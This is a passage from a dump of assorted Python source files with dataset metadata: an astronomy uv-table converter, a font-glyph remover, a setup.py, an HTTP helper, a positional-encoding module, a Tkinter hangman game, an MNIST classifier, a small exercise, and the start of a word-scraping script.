option.')\n print('')\n sys.exit()\n\n\n# \n# check uvt_names\nif len(uvt_names) > 1:\n print('Error! Please input only one uv table!')\n sys.exit(255)\n\n\n# \n# loop the input uvtables\nglobal_data_dict = OrderedDict()\nglobal_data_dict['ivis'] = []\n#global_data_dict['ichan'] = []\n#global_data_dict['istokes'] = []\nglobal_data_dict['u'] = []\nglobal_data_dict['v'] = []\nglobal_data_dict['w'] = []\nglobal_data_dict['re'] = []\nglobal_data_dict['im'] = []\nglobal_data_dict['wt'] = []\nglobal_data_dict['amp'] = []\n#global_data_dict['date'] = [] # if output date mjd and time then uncomment this line\n#global_data_dict['time'] = [] # if output date mjd and time then uncomment this line\nfor i_uvt in range(len(uvt_names)):\n uvt_name = uvt_names[i_uvt]\n uvt_type = 'none'\n # \n # check suffix\n if re.match(r'(.*?)\\.uvt', uvt_name, re.IGNORECASE):\n uvt_name = re.sub(r'(.*?)\\.uvt', r'\\1', uvt_name, re.IGNORECASE)\n uvt_type = 'uvt'\n elif re.match(r'(.*?)\\.uvfits', uvt_name, re.IGNORECASE):\n uvt_name = re.sub(r'(.*?)\\.uvfits', r'\\1', uvt_name, re.IGNORECASE)\n uvt_type = 'uvfits'\n else:\n print('Error! The input data is neither uvtable nor uvfits! Please check the input file type, make sure the suffix is either *.uvt or *.uvfits!')\n sys.exit()\n # \n # convert uvt to uvfits\n if uvt_type == 'uvt':\n # check existing file\n if os.path.isfile(out_name+'.uvfits'):\n print('Found existing \"{0}.uvfits\"! 
Backup it as \"{0}.uvfits.backup\"!'.format(out_name))\n shutil.move(out_name+'.uvfits', out_name+'.uvfits.backup')\n # run gildas/mapping\n print('Running: echo \"fits {0}.uvfits from {0}.uvt /style casa\" | mapping -nw -nl > {0}.uvfits.stdout.txt'.format(uvt_name))\n os.system('echo \"fits {0}.uvfits from {0}.uvt /style casa\" | mapping -nw -nl > {0}.uvfits.stdout.txt'.format(uvt_name))\n if not os.path.isfile(uvt_name+'.uvfits'):\n print('Error! Failed to call GILDAS/mapping to convert \"{0}.uvt\" to \"{0}.uvfits\"!'.format(uvt_name))\n sys.exit()\n # \n # read uvfits \n print('Reading '+uvt_name+'.uvfits')\n hdu = fits.open(uvt_name+'.uvfits')\n if type(hdu[0]) != fits.GroupsHDU:\n print('Error! The uvfits file \"{0}.uvfits\" is not fits.GroupsHDU type!'.format(uvt_name))\n sys.exit()\n tb = hdu[0]\n print(tb.columns)\n #print(len(tb.data))\n #print(tb.data.shape)\n #print(len(tb.data[0]))\n #print(tb.data[0]['DATA'].shape)\n #print(type(tb.data[0]['DATA']))\n #print(type(tb.data))\n #tb.data.sort(order=['UU','VV','WW'])\n # \n # read data array \n data_array = tb.data['DATA']\n print('DATA shape', data_array.shape)\n #print(tb.data['DATE'][0])\n #print(tb.data['DATE'][1])\n #print(tb.data['_DATE'][0])\n #print(tb.data['_DATE'][1])\n #print(tb.data['FREQSEL'][0])\n #print(tb.data['FREQSEL'][1])\n n_visi = data_array.shape[0]\n n_chan = data_array.shape[4]\n n_stokes = data_array.shape[5]\n # \n x_vis = np.linspace(1, n_visi, num=n_visi, endpoint=True, dtype=np.int32)\n global_data_dict['ivis'].extend(x_vis.flatten().tolist())\n global_data_dict['u'].extend((tb.data['UU'] * const.c.to('m/s').value).flatten().tolist())\n global_data_dict['v'].extend((tb.data['VV'] * const.c.to('m/s').value).flatten().tolist())\n global_data_dict['w'].extend((tb.data['WW'] * const.c.to('m/s').value).flatten().tolist())\n # \n # if the uv table has only one channel and one stokes, then we also output re im wt amp\n if n_chan == 1 and n_stokes == 1:\n global_data_dict['re'].extend(tb.data['DATA'].flatten().tolist()[0::3])\n global_data_dict['im'].extend(tb.data['DATA'].flatten().tolist()[1::3])\n global_data_dict['wt'].extend(tb.data['DATA'].flatten().tolist()[2::3])\n global_data_dict['amp'].extend(np.sqrt(np.array(global_data_dict['re'])**2 + np.array(global_data_dict['im'])**2).tolist())\n #global_data_dict['date'].extend((tb.data['DATE']).flatten().tolist()) # if output date mjd and time then uncomment this line\n #global_data_dict['time'].extend((tb.data['_DATE']).flatten().tolist()) # if output date mjd and time then uncomment this line\n \n # \n # check whether to keep rows where re, im, wt are all zeros\n if not keep_zeros:\n mask_zeros = np.logical_and.reduce((np.isclose(global_data_dict['re'], 0.0), np.isclose(global_data_dict['im'], 0.0), np.isclose(global_data_dict['wt'], 0.0)))\n count_zeros = np.count_nonzero(mask_zeros)\n if count_zeros > 0:\n print('Removing %d rows where re, im, wt are all zeros'%(count_zeros))\n for key in global_data_dict:\n global_data_dict[key] = np.array(global_data_dict[key])[~mask_zeros]\n\n\n#for i in ['ivis', 'ichan', 'istokes', 'u', 'v', 'w', 're', 'im', 'wt', 'amp', 'date', 'time']:\nfor i in ['ivis']:\n print('len(global_data_dict[%s]) = %d'%(i, len(global_data_dict[i])))\nkeys = list(global_data_dict.keys())\nfor key in keys:\n if len(global_data_dict[key]) == 0:\n del global_data_dict[key]\ntbout = Table(global_data_dict)\ntbout['u'].format = '%0.3f'\ntbout['v'].format = '%0.3f'\ntbout['w'].format = '%0.3f'\nif 'amp' in global_data_dict:\n tbout['re'].format = 
'%0.3E'\n tbout['im'].format = '%0.3E'\n tbout['wt'].format = '%0.3E'\n tbout['amp'].format = '%0.3E'\n\nregex_pattern = re.compile(r'^(.+)\\.(fits|txt|csv)$')\nif regex_pattern.match(out_name):\n out_base = regex_pattern.sub(r'\\1', out_name)\n out_type = regex_pattern.sub(r'\\2', out_name)\nelse:\n out_base = out_name\n out_type = 'fits'\n\nprint('Writing to disk')\nif out_type.lower() == 'txt':\n out_format = 'ascii.fixed_width'\n tbout.write(out_base+'.'+out_type, format=out_format, delimiter=' ', bookend=True, overwrite=True)\n with open(out_base+'.'+out_type, 'r+') as fp:\n fp.seek(0)\n fp.write('#')\nelse:\n out_format = out_type.lower()\n tbout.write(out_base+'.'+out_type, format=out_format, overwrite=True)\n\nprint('Output to \"%s\"!'%(out_base+'.'+out_type))\n\n\n\n\n\n","sub_path":"bin/pdbi-uvt-raw-uvtable-print-u-v-w.py","file_name":"pdbi-uvt-raw-uvtable-print-u-v-w.py","file_ext":"py","file_size_in_byte":8541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"305145565","text":"from vanilla.dialogs import *\n\n# copy-paste to fill this list with whatever glyphs fontMake flags as not being interpolatable\nglyphsToDelete = ['divide', 'plusminus']\n\n# help(CurrentFont().removeGlyph())\n\ninputFonts = getFile(\"select masters for var font\", allowsMultipleSelection=True, fileTypes=[\"ufo\"])\n\nfor fontPath in inputFonts:\n f = OpenFont(fontPath, showUI=False)\n # # open the fonts, then:\n for glyphName in glyphsToDelete:\n print(glyphName)\n if glyphName in f.glyphOrder:\n f.removeGlyph(glyphName)\n f.save()\n f.close()\n\n","sub_path":"remove-list-of-glyphs.py","file_name":"remove-list-of-glyphs.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"155554780","text":"from setuptools import setup, find_packages\n\nbase_packages = [\n \"numpy>=1.16.0\",\n \"scipy>=1.2.0\",\n \"scikit-learn>=0.20.2\",\n \"umap-learn>=0.3.10\",\n \"altair>=4.0.1\",\n \"matplotlib>=3.2.0\",\n \"spacy>=2.2.3\",\n \"networkx>=2.4\",\n \"sense2vec>=1.0.2\",\n \"fasttext>=0.9.1\"\n]\n\ndocs_packages = [\n \"mkdocs==1.1\",\n \"mkdocs-material==4.6.3\",\n \"mkdocstrings==0.8.0\",\n \"jupyterlab>=0.35.4\",\n \"nbstripout>=0.3.7\",\n \"nbval>=0.9.5\",\n]\n\ntest_packages = [\n \"flake8>=3.6.0\",\n \"nbval>=0.9.1\",\n \"pytest>=4.0.2\",\n \"black>=19.3b0\",\n \"pytest-cov>=2.6.1\",\n \"nbval>=0.9.5\",\n \"pre-commit>=2.2.0\"\n]\n\ndev_packages = docs_packages + test_packages\n\nsetup(\n name='whatlies',\n version=\"0.2.7\",\n author=\"Vincent D. 
Warmerdam\",\n packages=find_packages(exclude=['notebooks', 'docs']),\n description=\"Make visualisations to learn `what lies` in word embeddings.\",\n install_requires=base_packages,\n extras_require={\"docs\": docs_packages, \"dev\": dev_packages, \"test\": test_packages},\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"6423028","text":"import logging\nimport requests\n\nfrom .user_agent import get_user_agent_header\n\nLOG = logging.getLogger(__name__)\n\n\ndef handle_request(http_method, url, headers=None, **kwargs):\n all_headers = _combine_dicts(get_user_agent_header(), headers)\n parameters = _combine_dicts(\n {'timeout': 30}, kwargs)\n\n LOG.debug('HTTP {} {} headers={} params={}'.format(\n http_method, url, all_headers, parameters))\n\n response = requests.request(http_method, url, headers=all_headers,\n **parameters)\n response.raise_for_status()\n\n LOG.info('HTTP {} completed in {}s to {}'.format(\n response.request.method,\n response.elapsed.total_seconds(),\n response.request.url))\n\n return response\n\n\ndef _combine_dicts(main_dict, extra_dict_or_none):\n if extra_dict_or_none:\n assert isinstance(extra_dict_or_none, dict)\n main_dict.update(extra_dict_or_none)\n return main_dict\n","sub_path":"measurement_collector/downloaders/handle_request.py","file_name":"handle_request.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"500912934","text":"import math\n\nimport torch\nfrom torch import nn\n\n\nclass PositionalEncoding(nn.Module):\n \"Implement the PE function.\"\n\n def __init__(self, d_model, dropout, max_shape):\n # if large input is (b, dm1, dm2, ..., dmn)\n # max_shape should (dm1, dm2, ..., dmn)\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n # add batch dim and channel dim\n self.register_buffer('signal',\n self.position_encoding_nd(torch.zeros([1, *max_shape, d_model], dtype=torch.float)))\n # self.signal =\n self.linear = nn.Linear(2 * d_model, d_model)\n\n def forward(self, x):\n x = torch.cat((x, self.get_signal_like(x)), dim=-1)\n return self.linear(x)\n\n def get_signal_like(self, x):\n shape = [1, *x.shape[1:]]\n repeat = [x.shape[0]] + [1 for _ in x.shape[1:]]\n index = [slice(0, int(s)) for s in shape]\n signal: torch.Tensor = self.signal[index]\n return signal.repeat(repeat)\n\n def position_encoding_nd(self, x: torch.Tensor, min_timescale=1.0, max_timescale=1.0e4):\n \"\"\"\n 此处从tensor2tensor源码修改而来\n \"\"\"\n input_shape = x.shape\n num_dims = len(input_shape) - 2\n channels = input_shape[-1]\n # 计算每一个位置维度在channel维度上能占用多长, ��意此处计算的值是可占用长度的一半\n num_timescales = int(channels // (num_dims * 2))\n # 计算三角函数中的角速度参量\n log_timescale_increment = (\n math.log(float(max_timescale) / float(min_timescale)) /\n (float(num_timescales) - 1))\n # 生成要用于三角函数的时间序列 (1, num_timescales)\n inv_timescales = min_timescale * torch.exp(\n torch.arange(0, num_timescales, dtype=torch.float, device=x.device) * -log_timescale_increment\n ).unsqueeze(0)\n output = 
x.clone()\n for dim in range(num_dims):\n # 计算当前待编码维度的长度, 生成要用于三角函数的位置序列 (len, 1)\n length = input_shape[dim + 1]\n position = torch.arange(0, length, dtype=torch.float, device=x.device)\n # 计算得到当前维度的角度编码块,之后用于三角函数 (len, num_timescales)\n scaled_time = position.unsqueeze(1).mm(inv_timescales)\n\n # 在position矩阵前需要补齐的通道数\n prepad_channel_nam = dim * 2 * num_timescales\n prepad = torch.zeros((scaled_time.shape[0], prepad_channel_nam), device=x.device)\n # 在position矩阵后需要补齐的通道数\n postpad_channel_nam = channels - (dim + 1) * 2 * num_timescales\n postpad = torch.zeros((scaled_time.shape[0], postpad_channel_nam), device=x.device)\n # 补齐至与输入相同的通道数,\n # (len, prepad_channel_nam + num_timescales + num_timescales + postpad_channel_nam) = (len, dmodel)\n # 注意:prepad_channel_nam + num_timescales + num_timescales + postpad_channel_nam = dmodel\n signal = torch.cat([prepad, torch.sin(scaled_time), torch.cos(scaled_time), postpad], dim=1)\n # 补齐维度 (1, 1, ..., len, dmodel)\n for _ in range(1 + dim):\n signal = signal.unsqueeze(0)\n # 补齐维度 (1, 1, ..., len, 1, 1, ..., dmodel)\n for _ in range(num_dims - 1 - dim):\n signal = signal.unsqueeze(-2)\n # 与x相加, 长度为1的维度会被自动广播\n output = output + signal\n return output\n","sub_path":"code/model/ContextEncoder/positional_encoding.py","file_name":"positional_encoding.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"417143344","text":"#Hangman program with GUI\n#Trying out documentation for class\n\n#Features:\n# Display a few letters of the hidden word. Number depends on length of word OK\n# Hidden letters are replaced with underscore. OK\n# Actual hangman being drawn. OK\n# GameOver once hangman drawing is completed. OK\n# New game when words are guessed correctly. OK\n# A library of many words to choose from. **Can use txt file to compile lists of words.\n# Difficulty levels, easy and hard.\n\n\ntry:\n import tkinter\n\nexcept ImportError:\n import Tkinter as tkinter #For python2\n\nimport random\n\n#Class and functions\nclass hangMan(object):\n\n '''This class encompasses the whole hang man game. 
Each instances will be a hangman game.\n\n Attributes:\n __mode (str) : the mode of the game\n __randomWord (str) : The random word chosen from __wordList\n __wrongCounter (str) : The counter to determine when will the game be over\n __checkList (str) : A list that updates when user key in the correct letter.\n Will be used to check if the user have correctly typed out the correct word.\n __wordDict (dict) : A dictionary containing keys which indicates category.\n Under each key(category), there will be a set of words which fufils the category.\n The key will be used as hints.\n\n Methods:\n start(self) : To start the game.\n _randomWordGen(self) : From __wordList, pick a random word from a random category.\n Chosen word will be __randomWord.\n\n _displayHidWord(self, randomWord (str)) : Displays the argument, randomWord, on the game screen, hidden with '_'.\n Depending on the length of randomWord, different number of letters of randomWord will be revealed.\n\n inputChecker(self, letter (str)) : Takes in the arguement, letter, and check if\n the argument is the correct letter of the __randomWord.\n It will handle the outcome of getting the right and wrong letters.\n '''\n\n\n\n def __init__(self,mode):\n self.__mode = mode\n self.__randomWord = ''\n self.__wrongCounter = 0\n self.__checkList = []\n self.__wordDict = {'Animals':{'ELEPHANT','BIRD','DOG','DINOSAUR','BEAR','MONKEY'},\n 'Vehicles':{'PLANE','CAR','TRUCK','MOTORBIKE','BOAT','TRAIN'},\n }\n\n\n #Random word generator\n def _randomWordGen(self):\n\n #random.choice work with index. Therefore, a list of keys is needed.\n #Choose a random key(category).\n randomCat = random.choice(list(self.__wordDict))\n #Display hint.\n category.set('hint : ' + randomCat)\n\n #Storing the random word choosing the the category.\n self.__randomWord = random.choice(list(self.__wordDict[randomCat]))\n\n #Pass the chosen word to display appropriately on screen.\n self._displayHidWord(self.__randomWord)\n\n #Display the chosen word as '_'. Revealing only some\n def _displayHidWord(self, randomWord):\n '''Args:\n randomWord (str) : The string of the random chosen word to be hidden and displayed on the game screen.\n\n Functions:\n reveal (numToReveal (int)) : Decides how many letters of the chosen word to reveal.\n\n '''\n\n\n #Function to decide how many letters to reveal\n def reveal(numToReveal):\n '''Args:\n numToReveal (int) : Indicates how many letters of the chosen word to reveal.\n '''\n\n #sample returns a list of number(To be used as indexes).\n #To decide which index of the chosen word to reveal.\n #Second argument of sample indicates how many samples to collect.\n ranIndex = random.sample(range(0,len(randomWord)),numToReveal)\n\n #Using index to link display and the chosen word.\n for i in range(0,len(randomWord)):\n\n #If index number is in the sample, reveal the letter.\n if i in ranIndex:\n listOfDisplay[i].set(randomWord[i])\n #Add to check list.\n self.__checkList.append(randomWord[i])\n #If now chosen to be revealed, hide the letter with '_'.\n else:\n listOfDisplay[i].set('_')\n #Add to check list.\n self.__checkList.append('_')\n\n #NOTE THAT SINCE LETTERS ARE LITERATED IN INDEX ORDER, CHECKLIST WILL BE APPENDED IN\n # ORDER AS WELL\n # What is displayed on the game screen will be the same as what is in the list.\n\n #reveal function in use.\n #Depending on the length of the random word, reveal different number of letters.\n #The difficulty level function can be added here. 
but im lazy lols.\n length = len(randomWord)\n\n if self.__mode == 'easy':\n\n if length <= 4:\n reveal(2)\n\n if 5 <= length <= 6:\n reveal(3)\n\n if length == 7:\n reveal(4)\n\n if length == 8:\n reveal(5)\n\n if length > 8:\n reveal(6)\n\n elif self.__mode == 'hard':\n\n if length <= 4:\n reveal(1)\n\n if 5 <= length <= 6:\n reveal(2)\n\n if length == 7:\n reveal(2)\n\n if length == 8:\n reveal(3)\n\n if length > 8:\n reveal(4)\n\n #Starts the game by calling the function that generates random words.\n def start(self):\n self._randomWordGen()\n\n\n\n\n\n #Keying in alphabets.\n def inputChecker(self, letter):\n '''Args:\n letter (str) : The argument is the letter that is linked to each button.\n Using the letter, the function will check and decide the outcome of the game.\n Functions:\n newGame : Restarts the game after game is over, win or lose.\n gameOver : Indicates game over.\n wrongLetter (count(int)) : Keep tracks of the number of chances left\n and draws the hang man stroke by stroke.\n '''\n\n def newGame():\n\n #Making sure these variables are global, otherwise, other functions\n # that need these variables will be unable to access it.\n global GTWLabel\n global category\n global hint\n global letterFrame\n global hangManCanvas\n global newGameButton\n\n\n #Destroy new game button after clicking on the button\n newGameButton.destroy()\n\n #Reset counters and checklist\n self.__wrongCounter = 0\n self.__checkList = []\n\n #clear hidword display(max 10 letters)\n for i in range(0,10):\n listOfDisplay[i].set('')\n\n #clear dead hangman drawing.\n hangManCanvas.destroy()\n\n #Label 'guess the word' display again.\n GTWLabel = tkinter.Label(wordFrame,background='black', foreground='white', text='Guess the word!')\n GTWLabel.grid(row=0,column=0,sticky='ew')\n\n #Hint label again.\n category = tkinter.StringVar()\n hint = tkinter.Label(wordFrame, background='black', foreground='white', textvariable=category)\n hint.grid(row=1,column=0,sticky='ew')\n\n #Frame and buttons for the letters A to Z again.\n letterFrame = tkinter.Frame(wordFrame, background='black')\n letterFrame.grid(row=3,column=0,sticky='nsew')\n #Cannot use for row in range(0,5) as the number will only go to the next one\n # when the list is completely iterated.\n # ie. 
row will be 0 until the buttons for last letterSet is created.\n # resulting in the last letterSet being on row 0.\n #This will continue to the range, resulting in everyrow being the last letterSet only.\n\n row=0\n for letterSet in alphabets:\n column = 0\n for letter in letterSet:\n tkinter.Button(letterFrame, background ='black', foreground='white', width=4, text=letter, command=lambda letter=letter: hMGame.inputChecker(letter)).grid(row=row,column=column,stick='nsew')\n column += 1\n row +=1\n\n #Recreate hangman canvas\n hangManCanvas = tkinter.Canvas(hangManFrame, background='gray')\n hangManCanvas.grid(row=0,column=0,sticky='nsew')\n # (0,0) starts from the top left corner, everything within the canvas is postive.\n #create_line or create_oval has the coordinates argument format\n # (fromX,fromY,toX,toY)\n\n #Kick start the game.\n hMGame.start()\n\n\n def gameOver():\n #making newGameButton a global variable as it is needed by all the functions\n # in inputchecker.\n global newGameButton\n\n #Destroy all buttons, clear hint display and 'guess the word'.\n letterFrame.destroy()\n GTWLabel.destroy()\n hint.destroy()\n\n\n #Replace the chosen word display with game over.\n gameOverTxt = 'GAME OVER '\n\n for i in range(0,len(gameOverTxt)):\n listOfDisplay[i].set(gameOverTxt[i])\n\n #Create new game button.\n newGameButton = tkinter.Button(mainWindow, background ='black', foreground='white',text='New game',command=newGame)\n newGameButton.grid(row=1,column=0,sticky='nsew')\n\n\n\n\n def wrongLetter(count):\n #Hang man drawing, stroke by stroke, as wrong count increase.\n #support poles\n if count == 0:\n hangManCanvas.create_line(20,20,150,20,fill='white',width=6)\n\n elif count == 1:\n hangManCanvas.create_line(130,20,130,270,fill='white',width=6)\n\n #Rope\n elif count == 2:\n hangManCanvas.create_line(75,16,75,100,fill='brown', width=3)\n #head\n elif count == 3:\n hangManCanvas.create_oval(30,70,80,120,outline='white',fill='white',width=2)\n\n #torso and neck\n elif count == 4:\n hangManCanvas.create_line(70,120,80,112,fill='brown',width=7)\n hangManCanvas.create_line(75,123,75,180,fill='white',width=4)\n\n #arms\n elif count == 5:\n hangManCanvas.create_line(75,120,80,160,fill='white',width=4)\n\n elif count == 6:\n hangManCanvas.create_line(75,120,65,160,fill='white',width=4)\n\n #legs\n elif count == 7:\n hangManCanvas.create_line(75,180,65,240,fill='white',width=4)\n\n elif count == 8:\n hangManCanvas.create_line(75,180,85,240,fill='white',width=4)\n gameOver()\n\n #Under inputChecker\n #Updates the chosen word display letter by letter if the letter clicked by player is correct.\n #Comparing by repeated iteration for each letter clicked to allow\n #repeated letters to be updated. ie. MOON has 2 'O's. 
Using .find will only\n #result in the index of the first O to be returned, hence, the second O will\n #never be updated and the game will never end.\n for i in range(0,len(self.__randomWord)):\n #If letter clicked = letter of chosen Word in position i, update the display and checklist.\n if letter == self.__randomWord[i]:\n listOfDisplay[i].set(letter)\n self.__checkList[i] = letter\n\n #To see how the checklist updates as the game go on.\n print(self.__checkList)\n\n #Converts the chosen word into a list and compare it to the check list.\n #If both has the same value, The game will end and user will win.\n if list(self.__randomWord) == self.__checkList:\n\n global newGameButton\n\n letterFrame.destroy()\n GTWLabel.destroy()\n hint.destroy()\n\n winGameTxt = 'CONGRATZ!!'\n\n for i in range(0,len(winGameTxt)):\n listOfDisplay[i].set(winGameTxt[i])\n\n newGameButton = tkinter.Button(mainWindow, background ='black', foreground='white',text='New game',command=newGame)\n newGameButton.grid(row=1,column=0,sticky='nsew')\n\n\n #If letter clicked do not exist in the chosen word, draw the hangman and update wrong counter.\n if letter not in self.__randomWord:\n wrongLetter(self.__wrongCounter)\n self.__wrongCounter += 1\n\n\n\n\nif __name__ == '__main__':\n #The main window\n mainWindow = tkinter.Tk()\n mainWindow.title('Hangman')\n mainWindow.geometry('420x420+200+200')\n\n #Frame for the letter selections and words display.\n wordFrame = tkinter.Frame(mainWindow,background='black',relief='raised')\n wordFrame.grid(row=0,column=0,sticky='nswe')\n\n #Label 'guess the word' display.\n GTWLabel = tkinter.Label(wordFrame,background='black', foreground='white', text='Guess the word!')\n GTWLabel.grid(row=0,column=0,sticky='ew')\n\n #Hint label\n category = tkinter.StringVar()\n hint = tkinter.Label(wordFrame, background='black', foreground='white', textvariable=category)\n hint.grid(row=1,column=0,sticky='ew')\n\n\n\n #Frame and text for hiddenword display.\n hidWordFrame = tkinter.Frame(wordFrame, background='black', relief='sunken',borderwidth=10)\n hidWordFrame.grid(row=2, column=0,sticky='ew')\n\n\n #A way to produce many different displays will different tkinter.StringVar()\n #Assigning each key as number, in order of index, will link the position of each display to the position of each letter in the chosen word.\n # Since indexes progresses similarly, ie. 0,1,2,3,4....\n listOfDisplay = dict()\n for i in range(0,10):\n listOfDisplay[i] = tkinter.StringVar()\n #Each button will get its text from different tkinter.StringVar() attached to different keys.\n hidWordLabel = tkinter.Label(hidWordFrame, background='black', foreground='white', textvariable=listOfDisplay[i])\n #The labels will be created will left to right, with it getting its text from tkinter.StringVar()\n # that is attached to a number(acting as the index of the display)\n #It is like each display perfectly corresponds to each position of an iterable.\n hidWordLabel.grid(row=0,column=i,stick='nwes')\n #This implies that you can set the value of the label at a specific position that you want.\n\n\n\n\n #Frame and buttons for the letters A to Z\n letterFrame = tkinter.Frame(wordFrame, background='black')\n letterFrame.grid(row=3,column=0,sticky='nsew')\n\n alphabets = [('A','B','C','D','E'),('F','G','H','I','J'),('K','L','M','N','O'),\n ('P','Q','R','S','T'),('U','V','W','X','Y','Z')]\n\n\n #Cannot use for row in range(0,5) as the number will only go to the next one\n # when the list is completely iterated.\n # ie. 
row will be 0 until the buttons for last letterSet is created.\n # resulting in the last letterSet being on row 0.\n #This will continue to the range, resulting in everyrow being the last letterSet only.\n\n row=0\n for letterSet in alphabets:\n column = 0\n for letter in letterSet:\n #Lambda is like anon function in javascript.\n #Each letter iterated will be assigned to a default argument of the lambda expression.\n # and each button will have the lambda expression with different letter as its default argument.\n tkinter.Button(letterFrame, background ='black', foreground='white', width=4, text=letter, command=lambda buttonLetter=letter: hMGame.inputChecker(buttonLetter)).grid(row=row,column=column,stick='nsew')\n column += 1\n row +=1\n\n\n #Frame and canvas for hangman drawing.\n hangManFrame = tkinter.Frame(mainWindow)\n hangManFrame.grid(row=0,column=1,sticky='nsew')\n\n hangManCanvas = tkinter.Canvas(hangManFrame, background='gray')\n hangManCanvas.grid(row=0,column=0,sticky='nsew')\n # (0,0) starts from the top left corner, everything within the canvas is postive.\n #create_line or create_oval has the coordinates argument format\n # (fromX,fromY,toX,toY)\n\n\n\n #Initial launch of the game.\n hMGame = hangMan('hard')\n hMGame.start()\n\n mainWindow.mainloop()\n\n\n","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":16723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"201544090","text":"from tkinter import *\n\nclass MyCanvasClass(Canvas):\n \"\"\" A GUI class \"\"\"\n \n def __init__(self, master):\n \"\"\" Initialize the frame \"\"\"\n Canvas.__init__(self, master)\n self.pack()\n self.draw_canvas()\n\n def draw_canvas(self):\n for x in range(0,400,25):\n for y in range(0,200,25):\n self.create_rectangle(x, y, x+25, y+25, fill=\"lightblue\")\n self.create_line(0, 0, 400, 200)\n self.create_line(0, 100, 400, 0, fill=\"red\", dash=(4, 4))\n \n## -------------------------------------------------------\n \nroot = Tk()\nroot.title(\"Demo TKinter Canvas\")\nroot.geometry(\"300x200+100+100\")\n\nwindow = MyCanvasClass(root)\n\nroot.mainloop()\n","sub_path":"tkinter_canvas.py","file_name":"tkinter_canvas.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"555808590","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n#载入数据集,直接填写MNIST_data,会放到当前目录下。执行这条语句会去网上找\nmnist = input_data.read_data_sets(\"MNIST_data\", one_hot = True)\n\n#每个批次的大小,一次性放入100张图片(以矩阵形式放入)\nbatch_size = 50\n#计算一共有多少个批次\nn_batch = mnist.train.num_examples // batch_size\n\n#定义两个placeholder\nx = tf.placeholder(tf.float32,[None,784])\ny = tf.placeholder(tf.float32,[None,10])\n\n#定义中间层\nW = tf.Variable(tf.random_normal([784,20]))\nb = tf.Variable(tf.random_normal([1,20]))\nL1 = tf.nn.sigmoid(tf.matmul(x,W)+b)\n\n#定义输出层\nWeights_L2 = tf.Variable(tf.random_normal([20,10]))\nbiases_L2 = tf.Variable(tf.random_normal([1,10]))\nWx_plus_b_L2 = tf.matmul(L1,Weights_L2) + biases_L2\nprediction = tf.nn.sigmoid(Wx_plus_b_L2)\n\n#二次代价函数\nloss = tf.reduce_mean(tf.square(y-prediction))\n#使用梯度下降法\ntrain_step = tf.train.GradientDescentOptimizer(0.03).minimize(loss)\n\n#初始化变量\ninit = tf.global_variables_initializer()\n\n#正确率大小,结果存放在一个布尔型列表中。argmax中后面那个1参数,\n# axis = 0 的时候返回每一列最大值的位置索引\n# axis = 1 的时候返回每一行最大值的位置索引,argmax返回一维向量最大值所在的位置\ncorrect_prediction 
= tf.equal(tf.argmax(y,1),tf.argmax(prediction,1))\n#Compute the accuracy: cast bool --> float32, then take the mean\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\nwith tf.Session() as sess:\n    sess.run(init)\n    for epoch in range(500):\n        for batch in range(n_batch):\n            batch_xs,batch_ys = mnist.train.next_batch(batch_size) #data xs, labels ys\n            sess.run(train_step,feed_dict={x:batch_xs,y:batch_ys})\n\n        acc = sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels}) #feed the test data to the trained model\n        print(\"Iter\" + str(epoch) + \",Testing Accuracy \" + str(acc))","sub_path":"test/第三周/(改进)3-2MNIST数据集分类简单版本.py","file_name":"(改进)3-2MNIST数据集分类简单版本.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"217277277","text":"linha = input().split(\" \")\r\nlinha = [int(i) for i in linha]\r\nn1, n2, n3, n4 = linha\r\n\r\nhoras = 0\r\nif(n3 == 0):\r\n    n3 = 24\r\n\r\nminutos = (n3*60+n4)-(n1*60+n2)\r\nif(minutos < 0):\r\n    minutos = 1440 + minutos\r\n\r\nif(minutos == 0):\r\n    print(\"O JOGO DUROU 24 HORA(S) E 0 MINUTO(S)\")\r\nelse:\r\n    while (minutos >= 60):\r\n        minutos -= 60\r\n        horas += 1\r\n    print(\"O JOGO DUROU\",horas,\"HORA(S) E\",minutos,\"MINUTO(S)\")","sub_path":"URI-Exercícios/URI_1047_diferente.py","file_name":"URI_1047_diferente.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"467008109","text":"import core\nimport re\n\n\ntopic = input('Enter a word: ')\n\nwords = core.get_topic_words(topic)\nprint(f'Dumping a wall of thousands of words makes no sense, so we limit ourselves to the count.')\nprint(f'Number of words on the page: {len(words)}')\n\nwith open('new.html', 'r', encoding='utf-8') as f:\n    html = f.read()\n\nlinks = core.get_link(html)\n\nif len(links) > 10:\n    cmd = input(f'Number of neighbouring links: {len(links)}. Parsing will take a while. Do you really need it? Press [y] to continue: ')\n    if cmd.lower() != 'y':\n        exit()\n\nfor l in links:\n    try:\n        tmp = core.get_words_link(l)\n    except:\n        pass\n    else:\n        words += 